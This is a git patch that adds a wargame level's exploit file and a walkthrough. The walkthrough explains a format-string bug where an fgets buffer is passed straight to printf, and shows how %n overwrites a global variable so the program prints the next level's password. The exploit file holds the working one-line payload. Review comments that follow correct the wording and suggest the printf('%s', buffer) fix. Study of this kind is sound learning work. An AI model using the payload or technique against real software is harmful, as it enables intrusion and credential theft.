From 9d3bc5d550aa9dab36534ca71c63db11f37dcd94 Mon Sep 17 00:00:00 2001 From: 0x35c Date: Tue, 29 Apr 2025 12:00:07 +0200 Subject: [PATCH] level4 done --- level4/ressources/exploit | 1 + level4/walkthrough | 17 +++++++++++++++++ 2 files changed, 18 insertions(+) create mode 100644 level4/ressources/exploit create mode 100644 level4/walkthrough diff --git a/level4/ressources/exploit b/level4/ressources/exploit new file mode 100644 index 0000000..dedc96c --- /dev/null +++ b/level4/ressources/exploit @@ -0,0 +1 @@ +(python -c 'print "\x10\x98\x04\x08" + "%16930112p" + "%12$n"'; cat) | ./level4 diff --git a/level4/walkthrough b/level4/walkthrough new file mode 100644 index 0000000..c0ec80e --- /dev/null +++ b/level4/walkthrough 
@@ -0,0 +1,17 @@ +# Level4 + +Using ghidra, we can decompile the code and see that it fills a buffer of 520 bytes using `fgets`. +This buffer will then be passed directly as a parameter to `printf`. This allows us to print whatever we want (e.g dump the stack, change variables). +We can see in the decompiled code that a global variable `m` exists. The program will execute a `system("/bin/cat /home/user/level5/.pass")` if `m == 16930116`. +Our goal here will be to change the value of this variable in order to get the password. + +To do so, we will first dump the stack to know where the buffer is located. +Let's print something basic like `print("AAAA" + "%x"*20)`. We can see that 0x41414141 (= "AAAA") is printed at the 12th position in the stack. +Now that we know where our buffer is located on the stack, let's exploit printf. + +By using the `%n` flag, we can change the value of a variable to the length of what's been printed before (here, `m == 16930116`). +Since we cannot pass arguments to printf directly, we need to specify the position in the stack of the variable we want `%n` to print to. This is achieved by writing `m`'s address (obtained through gdb, static address since ASLR is disabled) at the beginning of the buffer. +Finally, we print the 16930112 bytes (+ 4 bytes for the address have already been printed) so that `m == 16930116`. +Unfortunately, unlike the previous level, we cannot print all the bytes directly in the buffer. For this, we will use printf's padding feature to print the right number of bytes. +Here is the command: +`(python -c 'print "\x10\x98\x04\x08" + "%16930112p" + "%12$n"'; cat) | ./level4`
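Review bot: `level4/ressources/exploit` is added as a plain-text file (mode 100644, no shebang) that contains a shell pipeline, so it is neither runnable as-is nor documented; either add `#!/bin/sh` and make it executable, or state in the walkthrough that the line is meant to be pasted into a shell. The one-liner also depends on Python 2 (`print "..."` statement syntax) and on glibc accepting the positional `%12$n` after the non-positional `%16930112p`; both assumptions deserve a comment in the file, since the same command fails on Python 3 and is undefined by POSIX when numbered and unnumbered conversions are mixed.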
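Review bot: the `%n` paragraph of `level4/walkthrough` is misleading in two places: "(here, `m == 16930116`)" reads as if `%n` itself writes 16930116, whereas `%n` stores the number of bytes printed so far and 16930116 is the target the padding is chosen to reach; and "the variable we want `%n` to print to" should be "write to". The arithmetic sentence would also be clearer as "the 4-byte address is already printed, so `%16930112p` pads 16930112 more bytes to reach 16930116". Finally, since the walkthrough identifies the root cause (the `fgets` buffer passed to `printf` as the format string), it should close with the fix a reviewer would expect, `printf("%s", buffer)`, and note that `gcc -Wformat-security` reports this pattern, so the level is a demonstration of why the warning matters.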